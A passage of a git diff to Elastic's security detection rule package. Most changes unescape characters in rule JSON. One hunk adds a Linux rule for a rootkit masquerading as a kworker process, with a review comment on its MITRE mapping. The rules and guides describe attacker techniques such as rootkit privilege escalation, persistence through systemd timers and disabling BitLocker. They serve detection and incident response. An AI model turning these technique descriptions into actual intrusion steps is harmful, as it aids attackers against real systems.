response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). 
Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "note": "## Triage and analysis\n\n### Investigating Google Workspace Bitlocker Setting Disabled\n\nBitLocker Drive Encryption is a data protection feature that integrates with the Windows operating system to address the data theft or exposure threats from lost, stolen, or inappropriately decommissioned computers. BitLocker helps mitigate unauthorized data access by enhancing file and system protections, such as data encryption and rendering data inaccessible. Google Workspace can sync with Windows endpoints that are registered in inventory, where BitLocker can be enabled and disabled.\n\nDisabling Bitlocker on an endpoint decrypts data at rest and makes it accessible, which raises the risk of exposing sensitive endpoint data.\n\nThis rule identifies a user with administrative privileges and access to the admin console, disabling BitLocker for Windows endpoints.\n\n#### Possible investigation steps\n\n- Identify the associated user accounts by reviewing `user.name` or `user.email` fields in the alert.\n- After identifying the user, verify if the user should have administrative privileges to disable BitLocker on Windows endpoints.\n- From the Google Workspace admin console, review `Reporting > Audit` and `Investigation > Device` logs, filtering on the user email identified from the alert.\n - If a Google Workspace user logged into their account using a potentially compromised account, this will create an `Device sync event` event.\n\n### False positive analysis\n\n- An administrator may have intentionally disabled BitLocker for routine maintenance or endpoint updates.\n - Verify with the user that they intended to disable BitLocker on Windows endpoints.\n\n### Response and remediation\n\n- 
Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls 
Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", "query": "event.dataset:\"google_workspace.admin\" and event.action:\"CHANGE_APPLICATION_SETTING\" and event.category:(iam or configuration)\n and google_workspace.admin.new_value:\"Disabled\" and google_workspace.admin.setting.name:BitLocker*\n", "references": [ "https://support.google.com/a/answer/9176657?hl=en" @@ -70,7 +70,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/7caa8e60-2df0-11ed-b814-f661ea17fbce_106.json b/packages/security_detection_engine/kibana/security_rule/7caa8e60-2df0-11ed-b814-f661ea17fbce_106.json index bf0da5bf5df..fe32547ec32 100644 --- a/packages/security_detection_engine/kibana/security_rule/7caa8e60-2df0-11ed-b814-f661ea17fbce_106.json +++ b/packages/security_detection_engine/kibana/security_rule/7caa8e60-2df0-11ed-b814-f661ea17fbce_106.json 
@@ -16,7 +16,7 @@ "language": "kuery", "license": "Elastic License v2", "name": "Google Workspace Bitlocker Setting Disabled", - "note": "## Triage and analysis\n\n### Investigating Google Workspace Bitlocker Setting Disabled\n\nBitLocker Drive Encryption is a data protection feature that integrates with the Windows operating system to address the data theft or exposure threats from lost, stolen, or inappropriately decommissioned computers. BitLocker helps mitigate unauthorized data access by enhancing file and system protections, such as data encryption and rendering data inaccessible. Google Workspace can sync with Windows endpoints that are registered in inventory, where BitLocker can be enabled and disabled.\n\nDisabling Bitlocker on an endpoint decrypts data at rest and makes it accessible, which raises the risk of exposing sensitive endpoint data.\n\nThis rule identifies a user with administrative privileges and access to the admin console, disabling BitLocker for Windows endpoints.\n\n#### Possible investigation steps\n\n- Identify the associated user accounts by reviewing `user.name` or `user.email` fields in the alert.\n- After identifying the user, verify if the user should have administrative privileges to disable BitLocker on Windows endpoints.\n- From the Google Workspace admin console, review `Reporting \u003e Audit` and `Investigation \u003e Device` logs, filtering on the user email identified from the alert.\n - If a Google Workspace user logged into their account using a potentially compromised account, this will create an `Device sync event` event.\n\n### False positive analysis\n\n- An administrator may have intentionally disabled BitLocker for routine maintenance or endpoint updates.\n - Verify with the user that they intended to disable BitLocker on Windows endpoints.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and 
response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). 
Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", + "note": "## Triage and analysis\n\n### Investigating Google Workspace Bitlocker Setting Disabled\n\nBitLocker Drive Encryption is a data protection feature that integrates with the Windows operating system to address the data theft or exposure threats from lost, stolen, or inappropriately decommissioned computers. BitLocker helps mitigate unauthorized data access by enhancing file and system protections, such as data encryption and rendering data inaccessible. Google Workspace can sync with Windows endpoints that are registered in inventory, where BitLocker can be enabled and disabled.\n\nDisabling Bitlocker on an endpoint decrypts data at rest and makes it accessible, which raises the risk of exposing sensitive endpoint data.\n\nThis rule identifies a user with administrative privileges and access to the admin console, disabling BitLocker for Windows endpoints.\n\n#### Possible investigation steps\n\n- Identify the associated user accounts by reviewing `user.name` or `user.email` fields in the alert.\n- After identifying the user, verify if the user should have administrative privileges to disable BitLocker on Windows endpoints.\n- From the Google Workspace admin console, review `Reporting > Audit` and `Investigation > Device` logs, filtering on the user email identified from the alert.\n - If a Google Workspace user logged into their account using a potentially compromised account, this will create an `Device sync event` event.\n\n### False positive analysis\n\n- An administrator may have intentionally disabled BitLocker for routine maintenance or endpoint updates.\n - Verify with the user that they intended to disable BitLocker on Windows endpoints.\n\n### Response and remediation\n\n- 
Initiate the incident response process based on the outcome of the triage.\n- Disable or limit the account during the investigation and response.\n- Identify the possible impact of the incident and prioritize accordingly; the following actions can help you gain context:\n - Identify the account role in the cloud environment.\n - Assess the criticality of affected services and servers.\n - Work with your IT team to identify and minimize the impact on users.\n - Identify if the attacker is moving laterally and compromising other accounts, servers, or services.\n - Identify any regulatory or legal ramifications related to this activity.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords or delete API keys as needed to revoke the attacker's access to the environment. Work with your IT teams to minimize the impact on business operations during these actions.\n- Review the permissions assigned to the implicated user to ensure that the least privilege principle is being followed.\n- Implement security best practices [outlined](https://support.google.com/a/answer/7587183) by Google.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector.\n- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n\n\n\n### Important Information Regarding Google Workspace Event Lag Times\n- As per Google's documentation, Google Workspace administrators may observe lag times ranging from minutes up to 3 days between the time of an event's occurrence and the event being visible in the Google Workspace admin/audit logs.\n- This rule is configured to run every 10 minutes with a lookback time of 130 minutes.\n- To reduce the risk of false negatives, consider reducing the interval that the Google Workspace (formerly G Suite) Filebeat module polls 
Google's reporting API for new events.\n- By default, `var.interval` is set to 2 hours (2h). Consider changing this interval to a lower value, such as 10 minutes (10m).\n- See the following references for further information:\n - https://support.google.com/a/answer/7061566\n - https://www.elastic.co/guide/en/beats/filebeat/current/filebeat-module-google_workspace.html", "query": "event.dataset:\"google_workspace.admin\" and event.action:\"CHANGE_APPLICATION_SETTING\" and event.category:(iam or configuration)\n and google_workspace.admin.new_value:\"Disabled\" and google_workspace.admin.setting.name:BitLocker*\n", "references": [ "https://support.google.com/a/answer/9176657?hl=en" @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/7ceb2216-47dd-4e64-9433-cddc99727623_103.json b/packages/security_detection_engine/kibana/security_rule/7ceb2216-47dd-4e64-9433-cddc99727623_103.json index 9f8eb4658a6..5f6c6e58f2d 100644 --- a/packages/security_detection_engine/kibana/security_rule/7ceb2216-47dd-4e64-9433-cddc99727623_103.json +++ b/packages/security_detection_engine/kibana/security_rule/7ceb2216-47dd-4e64-9433-cddc99727623_103.json @@ -58,7 +58,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/7ceb2216-47dd-4e64-9433-cddc99727623_104.json b/packages/security_detection_engine/kibana/security_rule/7ceb2216-47dd-4e64-9433-cddc99727623_104.json index 6a2cebea9eb..5213ae89823 100644 --- a/packages/security_detection_engine/kibana/security_rule/7ceb2216-47dd-4e64-9433-cddc99727623_104.json +++ b/packages/security_detection_engine/kibana/security_rule/7ceb2216-47dd-4e64-9433-cddc99727623_104.json 
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/7dfaaa17-425c-4fe7-bd36-83705fde7c2b_1.json b/packages/security_detection_engine/kibana/security_rule/7dfaaa17-425c-4fe7-bd36-83705fde7c2b_1.json
new file mode 100644
index 00000000000..2470426d5aa
--- /dev/null
+++ b/packages/security_detection_engine/kibana/security_rule/7dfaaa17-425c-4fe7-bd36-83705fde7c2b_1.json
@@ -0,0 +1,105 @@
+{
+ "attributes": {
+ "author": [
+ "Elastic"
+ ],
+ "description": "Monitors for the elevation of regular user permissions to root permissions through the kworker process. kworker, or kernel worker, processes are part of the kernel's workqueue mechanism. They are responsible for executing work that has been scheduled to be done in kernel space, which might include tasks like handling interrupts, background activities, and other kernel-related tasks. Attackers may attempt to evade detection by masquerading as a kernel worker process, and hijack the execution flow by hooking certain functions/syscalls through a rootkit in order to provide easy access to root via a special modified command.",
+ "from": "now-9m",
+ "index": [
+ "logs-endpoint.events.*"
+ ],
+ "language": "eql",
+ "license": "Elastic License v2",
+ "name": "Suspicious Kworker UID Elevation",
+ "query": "process where host.os.type == \"linux\" and event.action == \"session_id_change\" and event.type == \"change\" and\nprocess.name : \"kworker*\" and user.id == \"0\"\n",
+ "related_integrations": [
+ {
+ "package": "endpoint",
+ "version": "^8.2.0"
+ }
+ ],
+ "required_fields": [
+ {
+ "ecs": true,
+ "name": "event.action",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "event.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "host.os.type",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "process.name",
+ "type": "keyword"
+ },
+ {
+ "ecs": true,
+ "name": "user.id",
+ "type": "keyword"
+ }
+ ],
+ "risk_score": 47,
+ "rule_id": "7dfaaa17-425c-4fe7-bd36-83705fde7c2b",
+ "setup": "\nThis rule requires data coming in from Elastic Defend.\n\n### Elastic Defend Integration Setup\nElastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows\nthe Elastic Agent to monitor events on your host and send data to the Elastic Security app.\n\n#### Prerequisite Requirements:\n- Fleet is required for Elastic Defend.\n- To configure Fleet Server refer to the [documentation](https://www.elastic.co/guide/en/fleet/current/fleet-server.html).\n\n#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System:\n- Go to the Kibana home page and click Add integrations.\n- In the query bar, search for Elastic Defend and select the integration to see more details about it.\n- Click Add Elastic Defend.\n- Configure the integration name and optionally add a description.\n- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads.\n- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. [Helper guide](https://www.elastic.co/guide/en/security/current/configure-endpoint-integration-policy.html).\n- We suggest to select \"Complete EDR (Endpoint Detection and Response)\" as a configuration setting, that provides \"All events; all preventions\"\n- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead.\nFor more details on Elastic Agent configuration settings, refer to the [helper guide](https://www.elastic.co/guide/en/fleet/8.10/agent-policy.html).\n- Click Save and Continue.\n- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts.\nFor more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html).\n\n",
+ "severity": "medium",
+ "tags": [
+ "Domain: Endpoint",
+ "OS: Linux",
+ "Use Case: Threat Detection",
+ "Tactic: Privilege Escalation",
+ "Tactic: Defense Evasion",
+ "Data Source: Elastic Defend"
+ ],
+ "threat": [
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0004",
+ "name": "Privilege Escalation",
+ "reference": "https://attack.mitre.org/tactics/TA0004/"
+ },
+ "technique": [
+ {
+ "id": "T1574",
+ "name": "Hijack Execution Flow",
+ "reference": "https://attack.mitre.org/techniques/T1574/",
+ "subtechnique": [
+ {
+ "id": "T1574.013",
+ "name": "KernelCallbackTable",
+ "reference": "https://attack.mitre.org/techniques/T1574/013/"
+ }
+ ]
+ }
+ ]
+ },
+ {
+ "framework": "MITRE ATT&CK",
+ "tactic": {
+ "id": "TA0005",
+ "name": "Defense Evasion",
+ "reference": "https://attack.mitre.org/tactics/TA0005/"
+ },
+ "technique": [
+ {
+ "id": "T1014",
+ "name": "Rootkit",
+ "reference": "https://attack.mitre.org/techniques/T1014/"
+ }
+ ]
+ }
+ ],
+ "timestamp_override": "event.ingested",
+ "type": "eql",
+ "version": 1
+ },
+ "id": "7dfaaa17-425c-4fe7-bd36-83705fde7c2b_1",
+ "type": "security-rule"
+}
\ No newline at end of file
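Review bot: The `T1574.013` (KernelCallbackTable) sub-technique in the `threat` array is a Windows-only technique (hooking the PEB KernelCallbackTable) and does not describe a Linux rootkit hooking syscalls, so drop the `subtechnique` block and keep the parent `T1574` alongside the existing `T1014` Rootkit mapping, or choose a Linux-applicable sub-technique. The query's `user.id == "0"` clause adds no discrimination by itself, because genuine kernel worker threads also run as UID 0; the detection rests entirely on Elastic Defend emitting a `session_id_change` event for a process named `kworker*`, which real kernel threads presumably never produce, and the description's "elevation of regular user permissions" overstates this since no prior non-root UID is checked. If the endpoint event schema carries the real or saved UID, constrain on that to match the rule name; otherwise reword the description to say it detects a root process masquerading as a kernel worker. The rule also ships with no `note` investigation guide, `references` or `false_positives`, which the neighbouring rules in this package all carry; at minimum a guide should tell the analyst to check `/proc/<pid>/exe` and the parent process of the alerting PID, since a real kworker has no userland executable and is parented by kthreadd.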
diff --git a/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_103.json b/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_103.json
index 9981dcce3c6..037d39383c3 100644
--- a/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_103.json
+++ b/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_103.json
@@ -93,7 +93,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_104.json b/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_104.json
index 157fcd79d83..3d9620b7cc6 100644
--- a/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_104.json
+++ b/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_104.json
@@ -92,7 +92,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_105.json b/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_105.json
index e1e02dcf169..5d52fd795cb 100644
--- a/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_105.json
+++ b/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_105.json
@@ -93,7 +93,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
diff --git a/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_106.json b/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_106.json
index 94e63c83937..bf209d66503 100644
--- a/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_106.json
+++ b/packages/security_detection_engine/kibana/security_rule/7f370d54-c0eb-4270-ac5a-9a6020585dc6_106.json
@@ -94,7 +94,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0005",
 "name": "Defense Evasion",
@@ -109,7 +109,7 @@
 ]
 },
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0002",
 "name": "Execution",
diff --git a/packages/security_detection_engine/kibana/security_rule/7f89afef-9fc5-4e7b-bf16-75ffdf27f8db_1.json b/packages/security_detection_engine/kibana/security_rule/7f89afef-9fc5-4e7b-bf16-75ffdf27f8db_1.json
index c2a392f0727..24bf79a3f9c 100644
--- a/packages/security_detection_engine/kibana/security_rule/7f89afef-9fc5-4e7b-bf16-75ffdf27f8db_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/7f89afef-9fc5-4e7b-bf16-75ffdf27f8db_1.json
@@ -56,7 +56,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/7f89afef-9fc5-4e7b-bf16-75ffdf27f8db_101.json b/packages/security_detection_engine/kibana/security_rule/7f89afef-9fc5-4e7b-bf16-75ffdf27f8db_101.json
index 9bd2b10a88e..242174c4f60 100644
--- a/packages/security_detection_engine/kibana/security_rule/7f89afef-9fc5-4e7b-bf16-75ffdf27f8db_101.json
+++ b/packages/security_detection_engine/kibana/security_rule/7f89afef-9fc5-4e7b-bf16-75ffdf27f8db_101.json
@@ -65,7 +65,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0007",
 "name": "Discovery",
diff --git a/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_1.json b/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_1.json
index 66680a1e69e..ea6bffb4c5d 100644
--- a/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_1.json
+++ b/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_1.json
@@ -68,7 +68,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_2.json b/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_2.json
index 7a5cf87fda4..a2bb9d2f3ac 100644
--- a/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_2.json
+++ b/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_2.json
@@ -67,7 +67,7 @@
 ],
 "threat": [
 {
- "framework": "MITRE ATT\u0026CK",
+ "framework": "MITRE ATT&CK",
 "tactic": {
 "id": "TA0003",
 "name": "Persistence",
diff --git a/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_3.json b/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_3.json
index 47675834282..be4c14cbbfe 100644
--- a/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_3.json
+++ b/packages/security_detection_engine/kibana/security_rule/7fb500fa-8e24-4bd1-9480-2a819352602c_3.json
@@ -17,7 +17,7 @@ "file.path", "process.name" ], - "note": "## Triage and analysis\n\n### Investigating New Systemd Timer Created\n\nSystemd timers are used for scheduling and automating recurring tasks or services on Linux systems. \n\nAttackers can leverage systemd timers to run scripts, commands, or malicious software at system boot or on a set time interval by creating a systemd timer and a corresponding systemd service file. \n\nThis rule monitors the creation of new systemd timer files, potentially indicating the creation of a persistence mechanism.\n\n\u003e **Note**:\n\u003e This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n\u003e This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. 
If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the timer file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the currently enabled systemd timers through the following command `sudo systemctl list-timers`.\n- Search for the systemd service file named similarly to the timer that was created.\n- Investigate whether any other files in any of the available systemd directories have been altered through OSQuery.\n - !{osquery{\"label\":\"Osquery - Retrieve File Listing Information\",\"query\":\"SELECT * FROM file WHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/user/.config/systemd/user/%'\\n)\\n\"}}\n - !{osquery{\"label\":\"Osquery - Retrieve Additional File Listing Information\",\"query\":\"SELECT\\n f.path,\\n u.username AS file_owner,\\n g.groupname AS group_owner,\\n datetime(f.atime, 'unixepoch') AS file_last_access_time,\\n datetime(f.mtime, 'unixepoch') AS file_last_modified_time,\\n datetime(f.ctime, 'unixepoch') AS file_last_status_change_time,\\n datetime(f.btime, 'unixepoch') AS file_created_time,\\n f.size AS size_bytes\\nFROM\\n file f\\n LEFT JOIN users u ON f.uid = u.uid\\n LEFT JOIN groups g ON f.gid = g.gid\\nWHERE (\\npath LIKE '/etc/systemd/system/%' OR \\npath LIKE '/usr/local/lib/systemd/system/%' OR \\npath LIKE '/lib/systemd/system/%' OR\\npath LIKE '/usr/lib/systemd/system/%' OR\\npath LIKE '/home/{{user.name}}/.config/systemd/user/%'\\n)\\n\"}}\n- Investigate the script execution chain (parent process tree) for unknown processes. 
Examine their executable files for prevalence and whether they are located in expected locations.\n - !{osquery{\"label\":\"Osquery - Retrieve Running Processes by User\",\"query\":\"SELECT pid, username, name FROM processes p JOIN users u ON u.uid = p.uid ORDER BY username\"}}\n- Investigate other alerts associated with the user/host during the past 48 hours.\n- Validate the activity is not related to planned patches, updates, network administrator activity, or legitimate software installations.\n- Investigate whether the altered scripts call other malicious scripts elsewhere on the file system. \n - If scripts or executables were dropped, retrieve the files and determine if they are malicious:\n - Use a private sandboxed malware analysis system to perform analysis.\n - Observe and collect information about the following activities:\n - Attempts to contact external domains and addresses.\n - Check if the domain is newly registered or unexpected.\n - Check the reputation of the domain or IP address.\n - File access, modification, and creation activities.\n - Cron jobs, services and other persistence mechanisms.\n - !{osquery{\"label\":\"Osquery - Retrieve Crontab Information\",\"query\":\"SELECT * FROM crontab\"}}\n\n### False Positive Analysis\n\n- If this activity is related to new benign software installation activity, consider adding exceptions \u2014 preferably with a combination of user and command line conditions.\n- If this activity is related to a system administrator who uses systemd timers for administrative purposes, consider adding exceptions for this specific administrator user account. \n- Try to understand the context of the execution by thinking about the user, machine, or business purpose. 
A small number of endpoints, such as servers with unique software, might appear unusual but satisfy a specific business need.\n\n### Response and remediation\n\n- Initiate the incident response process based on the outcome of the triage.\n- Isolate the involved host to prevent further post-compromise behavior.\n- If the triage identified malware, search the environment for additional compromised hosts.\n - Implement temporary network rules, procedures, and segmentation to contain the malware.\n - Stop suspicious processes.\n - Immediately block the identified indicators of compromise (IoCs).\n - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system.\n- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services.\n- Delete the service/timer or restore its original configuration.\n- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components.\n- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector.\n- Leverage the incident response data and logging to improve the mean time to detect (MTTD) and the mean time to respond (MTTR).\n", + "note": "## Triage and analysis\n\n### Investigating New Systemd Timer Created\n\nSystemd timers are used for scheduling and automating recurring tasks or services on Linux systems. \n\nAttackers can leverage systemd timers to run scripts, commands, or malicious software at system boot or on a set time interval by creating a systemd timer and a corresponding systemd service file. 
\n\nThis rule monitors the creation of new systemd timer files, potentially indicating the creation of a persistence mechanism.\n\n> **Note**:\n> This investigation guide uses the [Osquery Markdown Plugin](https://www.elastic.co/guide/en/security/master/invest-guide-run-osquery.html) introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide.\n> This investigation guide uses [placeholder fields](https://www.elastic.co/guide/en/security/current/osquery-placeholder-fields.html) to dynamically pass alert data into Osquery queries. Placeholder fields were introduced in Elastic Stack version 8.7.0. If you're using Elastic Stack version 8.6.0 or earlier, you'll need to manually adjust this investigation guide's queries to ensure they properly run.\n\n#### Possible Investigation Steps\n\n- Investigate the timer file that was created or modified.\n - !{osquery{\"label\":\"Osquery - Retrieve File Information\",\"query\":\"SELECT * FROM file WHERE path = {{file.path}}\"}}\n- Investigate the currently enabled systemd timers through the following command `sudo systemctl list-timers`.\n- Search for the systemd service file named similarly to the timer that was created.\n- Investigate whether any other files in any 